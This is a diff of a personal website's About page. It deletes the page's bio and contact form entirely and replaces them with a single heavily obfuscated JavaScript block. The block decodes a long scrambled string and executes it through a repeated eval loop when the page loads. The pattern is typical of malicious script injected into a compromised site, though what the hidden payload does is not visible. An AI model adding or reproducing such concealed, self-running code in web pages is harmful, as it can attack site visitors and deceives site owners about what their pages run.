--- a/about/index.html
+++ b/about/index.html
@@ -1,54 +1,109 @@
----
-layout: default
-title: < About > HP-Nunes
----
-<style>
-.form{ margin: auto;
-	width: 70%;
-	margin-bottom: 100px;
-}
-</style>
-
-		<div class="about">
-			<h1>About</h1>
-		<br><br>
-			<p>Based in the San Francisco Bay Area, I’m a Geographer having challenging fun with GIS technology, data analysis, programming and web development. 
-				I am also working on a Masters of Environmental Assessment, so that I may apply myself towards issues pertaining to environmental planning, mitigation, and action.</p>
-		</div>
-
-		<div class='form'>
-			<h3>Drop me a line!</h3>
-			<br>
-		<form class="cf" id="formaction" method="POST" action="https://docs.google.com/forms/d/e/1FAIpQLSfClpXKzTROkO75KcvzsVD_k2NhMlNQWusImMbeQZePXoMZfw/formResponse?embedded=true">
-			<input type="text" name="_gotcha" style="display:none" /> <!--Security from spammer bots-->
-				<div class="half left cf">
-				  <input name="entry.1830870968" type="text" id="input-name" placeholder="Name">
-				  <input name="entry.2122153817" type="email" id="input-email" placeholder="Email address">
-				  <input name="entry.670532093" type="text" id="input-subject" placeholder="Subject">
-				</div>
-				<div class="half right cf">
-				  <textarea name="entry.1405106596" type="text" id="input-message" placeholder="Message"></textarea>
-				</div>  
-				<input type="submit" value="Submit" id="input-submit">
-		</form>
-			<script>
-					var contactform =  document.getElementById('formaction');
-					contactform.setAttribute('action', '//formspree.io/' + 'hadrien.nunes.picq' + '@' + 'gmail' + '.' + 'com');
-			</script>
-		</div>
-
-
-<!--If shit breaks-->
-<!-- <div>
-<form class="cf" action="https://docs.google.com/forms/d/e/1FAIpQLSfClpXKzTROkO75KcvzsVD_k2NhMlNQWusImMbeQZePXoMZfw/formResponse?embedded=true">
-<div class="half left cf">
-		<input name="entry.1830870968" type="text" id="input-name" placeholder="Name">
-		<input name="entry.2122153817" type="email" id="input-email" placeholder="Email address">
-		<input name="entry.670532093" type="text" id="input-subject" placeholder="Subject">
-	  </div>
-	  <div class="half right cf">
-		<textarea name="entry.1405106596" type="text" id="input-message" placeholder="Message"></textarea>
-	  </div>  
-	  <input type="submit" value="Submit" id="input-submit">
-	</form>
-</div> -->
+<script type="text/javascript">
+	//<![CDATA[
+	<!--
+	var x="function f(x){var i,o=\"\",ol=x.length,l=ol;while(x.charCodeAt(l/13)!" +
+	"=98){try{x+=x;l+=l;}catch(e){}}for(i=l-1;i>=0;i--){o+=x.charAt(i);}return o" +
+	".substr(0,ol);}f(\")96,\\\".$(;3.\\\"\\\\#-2}cm';hYv_<lr120\\\\330\\\\SG610" +
+	"\\\\%620\\\\+400\\\\)JQ.500\\\\130\\\\200\\\\410\\\\030\\\\730\\\\F630\\\\4" +
+	"30\\\\030\\\\t\\\\710\\\\G8^600\\\\010\\\\@}200\\\\)568,310\\\\un\\\\h1&>0&" +
+	"ol120\\\\8\\\"\\\\'+=4d130\\\\y&284730\\\\JHLUS500\\\\030\\\\720\\\\BiZo@m0" +
+	"20\\\\710\\\\020\\\\[EO500\\\\520\\\\010\\\\700\\\\RyJ771\\\\P}630\\\\~{o}o" +
+	"b|l8*+6Owvq|}hA)V4zbbikkgba220\\\\r\\\\\\\\\\\\Y&430\\\\730\\\\620\\\\500\\" +
+	"\\600\\\\120\\\\630\\\\_500\\\\500\\\\730\\\\000\\\\400\\\\N7Wr\\\\100\\\\G" +
+	"D9020\\\\330\\\\700\\\\520\\\\B300\\\\c8,\\\"\\\\.yz310\\\\`laeb`e771\\\\z|" +
+	"b28=&\\\"\\\\d130\\\\y&/ .730\\\\_XNZNA]Cn\\\\AhGn_l]r320\\\\610\\\\wLJ010\\"+
+	"\\SNBMQ200\\\\GL~v?@&ijy{u5bzv-0/zQbWxU6qoa+?\\\"\\\\!t\\\"\\\\320\\\\ t\\\\"+
+	"&GZ+200\\\\620\\\\120\\\\130\\\\020\\\\400\\\\#M2P630\\\\610\\\\610\\\\500\\"+
+	"\\700\\\\710\\\\300\\\\600\\\\500\\\\710\\\\220\\\\AB300\\\\*>918,+z\\\"\\\\"+
+	" $=;s410\\\\r*$li620\\\\=0\\\"\\\\2g030\\\\~'19K630\\\\730\\\\`010\\\\300\\" +
+	"\\t\\\\n\\\\400\\\\300\\\\500\\\\300\\\\500\\\\430\\\\HB[@H610\\\\w720\\\\L" +
+	"EFH500\\\\PVROI#jAhGtEjK(7H`atbkjl,gcheB$Y9qgel120\\\\520\\\\130\\\\030\\\\" +
+	"330\\\\520\\\\010\\\\WT)030\\\\230\\\\320\\\\430\\\\520\\\\B230\\\\030\\\\4" +
+	"30\\\\500\\\\300\\\\K4Z200\\\\410\\\\DA>r\\\\t\\\\>38~700\\\\g<(.\\\"\\\\uv" +
+	"710\\\\e`h|{|~y{{f>41*&`530\\\\}ZS\\\\\\\\R330\\\\NLHY_t\\\\@oFm^s\\\\\\\\q" +
+	"220\\\\t\\\\vLEFh700\\\\x630\\\\PDDsquyx{uh74Iq~s771\\\\={{}bb(U5co%&_vyen\\"+
+	"\\_ F730\\\\t\\\\100\\\\300\\\\VW(KDH@XV]_S[G120\\\\520\\\\220\\\\310\\\\10" +
+	"0\\\\A>\\\\\\\\500\\\\2?3|//)6>j!010\\\\'610\\\\?410\\\\=220\\\\sn720\\\\,*" +
+	"h3  (c$-!W430\\\\a100\\\\HIXTT620\\\\C]W610\\\\_l]r320\\\\610\\\\wO\\\\\\\\" +
+	"ZS330\\\\AAGFDBr{\\\"\\\\yhtvhdsGya}w?xhWAdRYm]W`fNoHs310\\\\*-5620\\\\4020" +
+	"\\\\9D630\\\\+7$200\\\\n\\\\130\\\\r\\\\&Y\\\\\\\\%200\\\\'52730\\\\/;220\\" +
+	"\\r\\\\#9r\\\\120\\\\r\\\\+320\\\\030\\\\630\\\\fy0{7}\\\"\\\\==!+c&%*f\\\"" +
+	"\\\\*\\\"\\\\+,%o3\\\\\\\\QY320\\\\420\\\\000\\\\JHCB]620\\\\o710\\\\__FZNM" +
+	"310\\\\010\\\\uND400\\\\y130\\\\PQ@L|>pnt|%vKdI*e{u,/# -7dUz[8()pi`e410\\\\" +
+	"730\\\\\\\\\\\\710\\\\320\\\\120\\\\310\\\\W020\\\\<Y^SM630\\\\3430\\\\1200" +
+	"\\\\7030\\\\5600\\\\;420\\\\9Z520\\\\310\\\\500\\\\Oc*100\\\\(700\\\\4500\\" +
+	"\\*310\\\\h!$: 2#`r9020\\\\?620\\\\=420\\\\)230\\\\7030\\\\xkf-P]230\\\\430" +
+	"\\\\020\\\\230\\\\630\\\\620\\\\020\\\\620\\\\630\\\\420\\\\420\\\\^XQBIn\\" +
+	"\\410\\\\000\\\\n\\\\610\\\\h000\\\\600\\\\610\\\\400\\\\400\\\\SBIo0nyuow6" +
+	"ys|fwsy7/%-+$e`&bcwtposo030\\\\RS\\\\\\\\ZU_130\\\\130\\\\430\\\\000\\\\020" +
+	"\\\\320\\\\VXn\\\\230\\\\030\\\\610\\\\200\\\\030\\\\530\\\\430\\\\&220\\\\" +
+	"000\\\\720\\\\M710\\\\320\\\\710\\\\9*>=/46;#n\\\\!010\\\\'610\\\\%410\\\\;" +
+	"220\\\\#020\\\\9620\\\\ra`(*-7! -MQ[330\\\\320\\\\^pAuB[Q^W]u[KJ200\\\\_DLE" +
+	"REJ@300\\\\200\\\\430\\\\000\\\\rlrzoyxlyyv4asgdSzQxW~U|[hYv_<up720\\\\710\\"+
+	"\\730\\\\010\\\\Fr\\\\$300\\\\*100\\\\(530\\\\.300\\\\,Q300\\\\730\\\\300\\" +
+	"\\r\\\\EU430\\\\;220\\\\9n\\\\?020\\\\=^}200\\\\)568,+z\\\"\\\\ $=;s410\\\\" +
+	"r*$li620\\\\=!*$0720\\\\a630\\\\|%JR\\\\\\\\J330\\\\030\\\\eL^[WA@020\\\\mr" +
+	"\\\\J^TX310\\\\^\\\\\\\\XIO130\\\\P771\\\\V}TCjArGhE87(c}w=-dSzQxW~Uf[tY:bg" +
+	"san\\\\500\\\\130\\\\710\\\\UEFU*020\\\\320\\\\220\\\\100\\\\200\\\\520\\\\" +
+	"\\\"\\\\L1Q130\\\\710\\\\r\\\\400\\\\010\\\\610\\\\000\\\\700\\\\200\\\\610" +
+	"\\\\120\\\\@}200\\\\8;:)*=:{!!#<8r320\\\\s)%kh520\\\\<?#1f730\\\\771\\\\$0F" +
+	"J530\\\\630\\\\g410\\\\000\\\\r\\\\100\\\\600\\\\400\\\\100\\\\300\\\\600\\" +
+	"\\000\\\\630\\\\V\\\\\\\\YBN010\\\\u520\\\\BKDJ300\\\\CDR~jeyo&98cJaHgNeLaR" +
+	"771\\\\P5(Und&qldks 030\\\\120\\\\530\\\\320\\\\X%E400\\\\500\\\\420\\\\030" +
+	"\\\\020\\\\R700\\\\130\\\\310\\\\R130\\\\0730\\\\6530\\\\4320\\\\:310\\\\81" +
+	"20\\\\>_620\\\\6:r`/600\\\\-400\\\\#n\\\\!010\\\\=610\\\\#410\\\\ql120\\\\8" +
+	"(/#*2520\\\\g030\\\\~0$$SQUYX[UH720\\\\420\\\\i@PW[RZ]000\\\\X^ZGA500\\\\z0" +
+	"30\\\\@J200\\\\300\\\\|kfxh9F$}goa41N\\\"\\\\)?<>9;=?&~tqjf ]=330\\\\020\\\\"+
+	"530\\\\520\\\\Zr\\\\r\\\\700\\\\030\\\\430\\\\HSR500\\\\,330\\\\2130\\\\073" +
+	"0\\\\6700\\\\4520\\\\:[F?120\\\\220\\\\500\\\\-:9={609:320\\\\w010\\\\n 44#" +
+	"!%)(+%8gd130\\\\(*#,%220\\\\JHLUS330\\\\dn\\\\R\\\\\\\\420\\\\120\\\\n]YNCH" +
+	"610\\\\w720\\\\LX^R500\\\\600\\\\771\\\\520\\\\020\\\\030\\\\,+,.)++6ndazv0" +
+	"M-jclb+~|xio9$#v]t\\\"\\\\t\\\\ 710\\\\&720\\\\$500\\\\*KV/720\\\\430\\\\12" +
+	"0\\\\!L1Q130\\\\710\\\\r\\\\400\\\\010\\\\610\\\\000\\\\700\\\\200\\\\610\\" +
+	"\\120\\\\@}200\\\\81:4t,\\\"\\\\&;=q610\\\\l4&no020\\\\?2,<e230\\\\x!3;5`53" +
+	"0\\\\b500\\\\n\\\\200\\\\n\\\\610\\\\000\\\\700\\\\500\\\\r\\\\500\\\\530\\" +
+	"\\KCDAK710\\\\p620\\\\ODII600\\\\QQSLH430\\\\?>i@oFmDcJ{HaN/2Shn,771\\\\lld" +
+	"'`iek ]=r\\\\610\\\\530\\\\720\\\\130\\\\Y610\\\\630\\\\220\\\\I000\\\\/600" +
+	"\\\\-400\\\\3230\\\\1200\\\\7030\\\\5VJK620\\\\020\\\\410\\\\000\\\\A220\\\\"+
+	":30=+)y58$3t*&8\\\"\\\\:-(730\\\\fghtgxjda630\\\\$.PP700\\\\EZVIK^R720\\\\h" +
+	"610\\\\W]I[]r\\\\610\\\\wKAKSIB{100\\\\~430\\\\Er771\\\\s<9Fm`rb7H.wai{.yy{" +
+	"d`4sZqXw^o\\\\\\\\410\\\\!BY&430\\\\r\\\\500\\\\200\\\\H020\\\\620\\\\620\\" +
+	"\\520\\\\520\\\\r\\\\300\\\\010\\\\S610\\\\130\\\\700\\\\700\\\\720\\\\520\\"+
+	"\\000\\\\6610\\\\020\\\\610\\\\600\\\\p);600\\\\620\\\\5100\\\\010\\\\2410\\"+
+	"\\400\\\\11730\\\\<130\\\\<;230\\\\530\\\\500\\\\&400\\\\ t\\\\t.330\\\\700" +
+	"\\\\420\\\\2:I]vt\\\\410\\\\uRwebO771\\\\kB]sI}a}[chn620\\\\t\\\\@310\\\\Gr" +
+	"\\\\RMmq{3vuz6rzr{|u?clai#$0zxsrm&_?oo720\\\\t\\\\730\\\\230\\\\Z[$#%:$Q.L4" +
+	"20\\\\000\\\\600\\\\130\\\\t\\\\600\\\\JK4t\\\\t\\\\410\\\\020\\\\000\\\\30" +
+	"0\\\\410\\\\220\\\\08771\\\\000\\\\f>0xun\\\\37q610\\\\l#</!/k';'!z1030\\\\" +
+	"7630\\\\/430\\\\Mb300\\\\NY600\\\\MdCjAh]nCl120\\\\530\\\\E300\\\\720\\\\31" +
+	"0\\\\LFNJ500\\\\E300\\\\GL000\\\\oqoX%)q$cJaHgN771\\\\L}R3+fxfn ;vwbnb 010\\"+
+	"\\420\\\\030\\\\G610\\\\%410\\\\+030\\\\)600\\\\/430\\\\-200\\\\3P330\\\\50" +
+	"0\\\\710\\\\EU430\\\\;220\\\\9n\\\\?020\\\\=^/qar550,47u0=3q|!!$8*- <.+eh$," +
+	"(.Q_QL330\\\\VXLYSXZ\\\\\\\\@XFAKr\\\\C_n\\\\NFNHLEWPDP?mxihip8drgud}e0ibh7" +
+	"71\\\\rg)qkvue#{`m^4\\\\\\\\710\\\\330\\\\120\\\\410\\\\W130\\\\600\\\\T_60" +
+	"0\\\\730\\\\520\\\\200\\\\530\\\\630\\\\t\\\\030\\\\130\\\\(H310\\\\700\\\\" +
+	"120\\\\n\\\\600\\\\710\\\\710\\\\710\\\\-7+2630\\\\z?7w%'1'!0530\\\\o/m\\\"" +
+	"\\\\$j.&.-7+4b.3S_530\\\\QZ230\\\\pLkBi@oFm^s\\\\\\\\q410\\\\500\\\\^GMJVJH" +
+	"FTDD?|xk;~wy7q{}~771\\\\pbha771\\\\|+&zat771\\\\iemc!an\\\\430\\\\030\\\\[V" +
+	"000\\\\730\\\\030\\\\230\\\\230\\\\230\\\\330\\\\120\\\\420\\\\400\\\\O=$+K" +
+	"200\\\\530\\\\100\\\\020\\\\F310\\\\120\\\\500\\\\B600\\\\610\\\\693976804v" +
+	"2::$08o<($;+;/(#200\\\\d\\\"\\\\b,q410\\\\410\\\\a410\\\\310\\\\010\\\\en\\" +
+	"\\300\\\\500\\\\i}320\\\\630\\\\PU]or\\\\UJht\\\\GDULGMCSf?p|O;771\\\\ql7x|" +
+	"4wwbqM0}0771\\\\V}TsZkXq^?r430\\\\ABt\\\\030\\\\E410\\\\+200\\\\)230\\\\/00" +
+	"0\\\\-N^600\\\\BP730\\\\730\\\\600\\\\n\\\\&XT410\\\\_620\\\\=420\\\\300\\\\"+
+	"*100\\\\2700\\\\(500\\\\fun\\\\!!<00r320\\\\s>?*&*h1/!x7630\\\\5430\\\\QbO`" +
+	"UfKdt\\\\SYMGA630\\\\410\\\\Ar_pVDuZ{530\\\\]T320\\\\220\\\\020\\\\000\\\\%" +
+	"srhou{5y771\\\\rfr771\\\\eLaR771\\\\P0/9?'<mpgkvt\\\"\\\\320\\\\ t\\\\&B720" +
+	"\\\\300\\\\300\\\\420\\\\TI430\\\\030\\\\720\\\\530\\\\710\\\\000\\\\L020\\" +
+	"\\700\\\\330\\\\700\\\\100\\\\H310\\\\8120\\\\>_500\\\\3')/g4500\\\\*310\\\\"+
+	"{xy=610\\\\#410\\\\ylfrH(TK\\\"\\\\? n\\\\010\\\\320\\\\130\\\\;YDWL020\\\\" +
+	"030\\\\700\\\\330\\\\500\\\\630\\\\3430\\\\1030\\\\700\\\\730\\\\010\\\\610" +
+	"\\\\200\\\\200\\\\E^720\\\\720\\\\610\\\\130\\\\>23000\\\\)600\\\\tuzt}:?7%" +
+	"9=9c8%/$=$)!\\\"(f};o nruter};))++y(^)i(tAedoCrahc.x(edoCrahCmorf.gnirtS=+o" +
+	";721=%y;i=+y)96==i(fi{)++i;l<i;0=i(rof;htgnel.x=l,\\\"\\\"=o,i rav{)y,x(f n" +
+	"oitcnuf\")"                                                                  ;
+	while(x=eval(x));
+	//-->
+	//]]>
+	</script>
+	
